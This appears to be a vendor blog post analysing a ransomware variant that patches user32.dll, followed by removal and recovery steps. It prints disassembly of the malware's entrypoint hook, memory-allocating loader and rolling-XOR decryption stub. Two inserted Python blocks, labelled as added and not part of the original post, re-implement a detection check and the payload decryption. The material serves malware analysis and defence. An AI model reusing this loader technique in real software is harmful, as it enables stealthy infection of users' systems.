This post is a follow-up to our previous post about ransomware that infects user32.dll.
A new variant of the Department of Justice (DOJ) ransomware that embeds itself inside user32.dll is spreading.
This new variant has updated its tactics to avoid detection by antivirus programs. The following section presents an analysis of the new version and points out the changes that have been made.
Just as in the previous version, the ransomware patches the code at the entrypoint of user32.dll. This time, however, the malware authors tried to keep the entrypoint as close to the original as possible: the first instruction (mov edi,edi) is dropped and the original CALL is replaced with a CALL to AlignRects. Compare the original and the patched disassembly below:
UserClientDllInitialize (original):
    7e41b217 mov edi, edi
    7e41b219 push ebp
    7e41b21a mov ebp, esp
    7e41b21c cmp [ebp+0xC], 1
    7e41b220 jnz 0x7e41b227
    7e41b222 call 0x7e41b984
    7e41b227 pop ebp
    7e41b228 nop
    7e41b229 nop
    7e41b22a nop
    7e41b22b nop
    7e41b22c nop
    7e41b22d mov edi, edi
    7e41b22f push ebp

UserClientDllInitialize (patched by the new variant):
    7e41b217 push ebp
    7e41b218 mov ebp, esp
    7e41b21a cmp [ebp+0xC], 1
    7e41b21e jne 0x7e41b225
    7e41b220 call USER32!AlignRects (7e46d4e0)
    7e41b225 add [eax], al
    7e41b227 pop ebp
    7e41b228 nop
    7e41b229 nop
    7e41b22a nop
    7e41b22b nop
    7e41b22c nop
    7e41b22d mov edi, edi
    7e41b22f push ebp
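A quick triage check that follows from the listings above, written as an added example (it is not HitmanPro code and not part of the original post): locate the entrypoint of a user32.dll copy on disk by parsing its PE headers and verify that the code there still begins with the hot-patchable prologue (mov edi,edi / push ebp / mov ebp,esp) that the original entry point shows and the patched one lacks. The entry-point byte sequences below are reconstructed from the disassembly in the post (the instruction encodings are my own), and the minimal PE builder only exists to produce a constructed sample file to run the check against. This is a heuristic: the authoritative test is comparing the file against a known-clean copy of the same version, which is what the replacement procedure later in the post does.

```python
import struct

# Entry-point bytes reconstructed from the two listings in the post (encodings are mine).
# Original: mov edi,edi / push ebp / mov ebp,esp / cmp [ebp+0Ch],1 / jnz +5 / call rel32 / pop ebp / nop...
ORIGINAL_ENTRY = bytes.fromhex("8bff558bec837d0c017505e85d0700005d9090909090")
# Patched: mov edi,edi dropped, call retargeted to AlignRects (rel32), two zero bytes of padding.
PATCHED_ENTRY = bytes.fromhex("558bec837d0c017505e8bb22050000005d9090909090")
# The hot-patchable prologue the genuine entry point starts with (assumption: treated as the expected shape).
HOTPATCH_PROLOGUE = bytes.fromhex("8bff558bec")


def entrypoint_bytes(pe: bytes, count: int = 16) -> bytes:
    """Return `count` bytes at AddressOfEntryPoint of a 32-bit PE image read from disk.
    The RVA is mapped to a file offset through the section table."""
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[:2] != b"MZ" or pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    nsec, = struct.unpack_from("<H", pe, e_lfanew + 6)          # NumberOfSections
    opt_size, = struct.unpack_from("<H", pe, e_lfanew + 20)     # SizeOfOptionalHeader
    opt = e_lfanew + 24                                          # optional header start
    ep_rva, = struct.unpack_from("<I", pe, opt + 16)             # AddressOfEntryPoint
    for i in range(nsec):
        hdr = opt + opt_size + 40 * i
        vsize, va, raw_size, raw_ptr = struct.unpack_from("<IIII", pe, hdr + 8)
        if va <= ep_rva < va + max(vsize, raw_size):
            off = raw_ptr + (ep_rva - va)
            return pe[off:off + count]
    raise ValueError("entrypoint RVA is not inside any section")


def check_entrypoint(pe: bytes) -> dict:
    """Heuristic: report whether the entry point still carries the hot-patch prologue."""
    ep = entrypoint_bytes(pe, 16)
    return {"entry_bytes": ep.hex(), "hotpatch_prologue": ep.startswith(HOTPATCH_PROLOGUE)}


def build_test_pe(entry_code: bytes) -> bytes:
    """Constructed sample: a minimal PE32 with one .text section at RVA 0x1000 / file offset 0x200
    whose entry point starts with `entry_code`. Not a real user32.dll."""
    e_lfanew, opt_size, raw_ptr = 0x40, 0xE0, 0x200
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, opt_size, 0x2102)  # i386, 1 section, DLL
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)          # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)        # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x7E410000)    # ImageBase (value taken from the post)
    section = b".text\0\0\0" + struct.pack("<IIIIIIHHI", len(entry_code), 0x1000, 0x200,
                                            raw_ptr, 0, 0, 0, 0, 0x60000020)
    image = bytearray(dos + b"PE\0\0" + coff + opt + section)
    image += b"\0" * (raw_ptr - len(image))
    image += entry_code.ljust(0x200, b"\0")
    return bytes(image)


if __name__ == "__main__":
    for label, code in (("original", ORIGINAL_ENTRY), ("patched", PATCHED_ENTRY)):
        print(label, check_entrypoint(build_test_pe(code)))
```

To run this against a real file, read it with `open(path, "rb").read()` instead of `build_test_pe`; a missing prologue is a reason to compare the file's hash against a clean copy, not a verdict on its own.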
Furthermore, the code at AlignRects is modified so that it allocates a new block of executable memory and then copies the encrypted payload from the resource section into that newly allocated block. It uses the same technique as the previous version to obtain the address of NtAllocateVirtualMemory(), which it calls to allocate a writeable/executable region of memory. The copied blob consists of the encrypted payload followed by a small piece of code that decrypts it.
AlignRects:
    7e46d4e0 pushad
    7e46d4e1 mov eax,dword ptr [ebp+8]    ; EAX = base address of user32.dll (7E410000)
    7e46d4e4 mov ecx,eax
    7e46d4e6 add eax,13BCh
    7e46d4eb mov eax,dword ptr [eax]      ; EAX = address of NtQueryVirtualMemory
    7e46d4ed add eax,0FFFFF5F0h           ; EAX = address of NtAllocateVirtualMemory
    7e46d4f2 sub esp,8
    7e46d4f5 push 40h                     ; PAGE_EXECUTE_READWRITE
    7e46d4f7 push 3000h
    7e46d4fc lea ecx,[ebp-4]
    7e46d4ff mov [ecx],0E800h
    7e46d505 push ecx
    7e46d506 push 0
    7e46d508 lea ecx,[ebp-8]
    7e46d50b mov [ecx],0
    7e46d511 push ecx
    7e46d512 push 0FFFFFFFFh
    7e46d514 call eax                     ; call NtAllocateVirtualMemory
    7e46d516 mov edi,[ebp-8]              ; EDI = allocated address (00290000)
    7e46d519 mov eax,edi
    7e46d51b mov esi,[ebp+8]              ; ESI = base address of user32.dll (7E410000)
    7e46d51e add esi,8D200h               ; ESI = address of encrypted payload in resource section
    7e46d524 mov ecx,98AEh                ; number of bytes to copy
    7e46d529 rep movs es:[edi],ds:[esi]   ; copy to allocated (executable) memory range
    7e46d52b add esp,8
    7e46d52e add eax,981Eh                ; EAX = address of decryption code (0029981E)
    7e46d533 jmp eax                      ; start decryption !!
The decryption loop is comparable to the previous version; only some constant values have changed, for instance the decryption key.
Decryption loop:
    0029981e call 00299823
    00299823 pop edx                      ; EDX = current location
    00299824 sub edx,7FFA2F3Dh
    0029982a push esi
    0029982b lea esi,[edx+7FFA2F38h]      ; ESI = 0029981E - start of decryption code
    00299831 mov ecx,981Eh                ; encrypted payload length
    00299836 sub esi,ecx                  ; ESI = allocated mem-base (290000)
    00299838 push esi
    00299839 mov ebx,1218F90h             ; the XOR key (BL only, so 90h)
    0029983e xor byte ptr [esi],bl        ; decrypt a byte of the encrypted payload
    00299840 inc esi
    00299841 inc ebx                      ; modify XOR key for each byte (+1)
    00299842 loop 0029983e
    00299844 pop eax
    00299845 pop ecx
    00299846 mov [eax+12h],ecx
    00299849 jmp eax                      ; jump to allocated mem-base, which is now decrypted
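For analysts who want the payload without running the infected DLL, here is the copy-and-decrypt sequence from the two listings above (AlignRects and the decryption loop) re-implemented in Python. This is an added example, not code from the original post or from HitmanPro: the offsets and constants (0x8D200, 0x98AE, 0x981E, the key 0x1218F90 of which only BL is used, and the DWORD store at offset 0x12) are taken from the disassembly; the sample image it runs on is constructed inline. It expects a dump of the loaded user32.dll image (the offset 0x8D200 is relative to the image base), so a file on disk must first be mapped or the resource data located at the equivalent file offset. The helper `build_sample_image` and the function names are my own.

```python
import struct

# Constants taken from the AlignRects and decryption-stub disassembly in the post.
PAYLOAD_RVA = 0x8D200      # ESI = image base + 8D200h: start of the encrypted blob
BLOB_LEN = 0x98AE          # ECX for rep movs: bytes copied into the RWX allocation
CIPHERTEXT_LEN = 0x981E    # ECX for the loop: bytes the stub XOR-decrypts
STUB_LEN = BLOB_LEN - CIPHERTEXT_LEN   # 0x90 bytes of decryption code follow the ciphertext
INITIAL_KEY = 0x1218F90    # MOV EBX,1218F90h; the XOR uses BL only, so the first key byte is 0x90
PATCH_OFFSET = 0x12        # MOV [EAX+12h],ECX after decryption (ECX = the ESI saved on entry)


def xor_rolling(data: bytes, key: int = INITIAL_KEY) -> bytes:
    """Model of: xor byte ptr [esi],bl / inc esi / inc ebx / loop.
    Each byte is XORed with the low byte of a 32-bit counter that starts at `key`
    and increments once per byte, so BL wraps from 0xFF to 0x00 every 256 bytes.
    XOR is symmetric, so the same routine encrypts and decrypts."""
    out = bytearray(len(data))
    ebx = key & 0xFFFFFFFF
    for i, b in enumerate(data):
        out[i] = b ^ (ebx & 0xFF)
        ebx = (ebx + 1) & 0xFFFFFFFF
    return bytes(out)


def split_blob(blob: bytes):
    """The copied blob is ciphertext followed by the decryption stub."""
    if len(blob) != BLOB_LEN:
        raise ValueError("expected a %#x-byte blob, got %#x" % (BLOB_LEN, len(blob)))
    return blob[:CIPHERTEXT_LEN], blob[CIPHERTEXT_LEN:]


def recover_payload(image: bytes, saved_esi=None) -> bytes:
    """Reproduce what the stub leaves at the allocation base: the first 0x981E bytes
    decrypted and, if `saved_esi` is given, that value written as a DWORD at offset
    0x12 (the post shows the store but not what the payload does with it)."""
    blob = image[PAYLOAD_RVA:PAYLOAD_RVA + BLOB_LEN]
    ciphertext, _stub = split_blob(blob)
    plain = bytearray(xor_rolling(ciphertext))
    if saved_esi is not None:
        struct.pack_into("<I", plain, PATCH_OFFSET, saved_esi & 0xFFFFFFFF)
    return bytes(plain)


def build_sample_image(plain: bytes) -> bytes:
    """Constructed sample (not real malware): an image-sized buffer whose resource area
    holds `plain` encrypted with the rolling XOR, followed by a dummy 0x90-byte stub."""
    if len(plain) != CIPHERTEXT_LEN:
        raise ValueError("plaintext must be exactly %#x bytes" % CIPHERTEXT_LEN)
    image = bytearray(PAYLOAD_RVA + BLOB_LEN)
    image[PAYLOAD_RVA:PAYLOAD_RVA + CIPHERTEXT_LEN] = xor_rolling(plain)
    image[PAYLOAD_RVA + CIPHERTEXT_LEN:PAYLOAD_RVA + BLOB_LEN] = b"\x90" * STUB_LEN
    return bytes(image)


if __name__ == "__main__":
    sample_plain = (b"constructed payload " * 2000)[:CIPHERTEXT_LEN]
    recovered = recover_payload(build_sample_image(sample_plain))
    print("recovered %d bytes, matches: %s" % (len(recovered), recovered == sample_plain))
```

On a real dump, `recover_payload` gives the decrypted blob to examine with a disassembler; the `_stub` slice is the 0x90-byte decryption code itself, which can be compared against the listing above to confirm the variant.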
Removing the ransomware from your system
Victims can use HitmanPro.Kickstart to get rid of the police-themed ransomware infection (including this new variant). If HitmanPro detects the ransomware, it queries our cloud service for a clean copy of the system file, which is then used to replace the infected one on your system.
If for some reason the specific version of your infected user32.dll cannot be obtained from the cloud service, you can manually copy a clean version of user32.dll onto the HitmanPro.Kickstart flash drive. If the version of the infected file on your disk matches that of the clean version on the flash drive, HitmanPro will use that version to replace the infected one on your Windows installation.
You can download HitmanPro with Kickstart from here:
Manual replacement of user32.dll
In the event that you are not able to obtain a clean version of user32.dll for your system, you can try the following manual procedure.
The ransomware makes an encrypted copy of the original user32.dll file and stores it in:
You can decrypt this file using our User32DLL decryptor tool, which can be downloaded from: http://dl.surfright.nl/User32Decryptor.exe
See the following screenshot for an example:
You need to retrieve the encrypted user32.ini by e.g. using a Hiren's boot CD or some other bootable medium that can access your Windows system disk. Once you have decrypted the file, copy it to the HitmanPro.Kickstart flash drive. Note that the file must be named user32.dll. Once the decrypted file is on the flash drive, boot your system from the HitmanPro.Kickstart flash drive and HitmanPro will use the manually decrypted user32.dll to replace the infected one on your system.
Note: Before performing this action, make a copy of the infected user32.dll. If something goes wrong with the procedure, you can restore the infected file so that your system will at least be able to boot.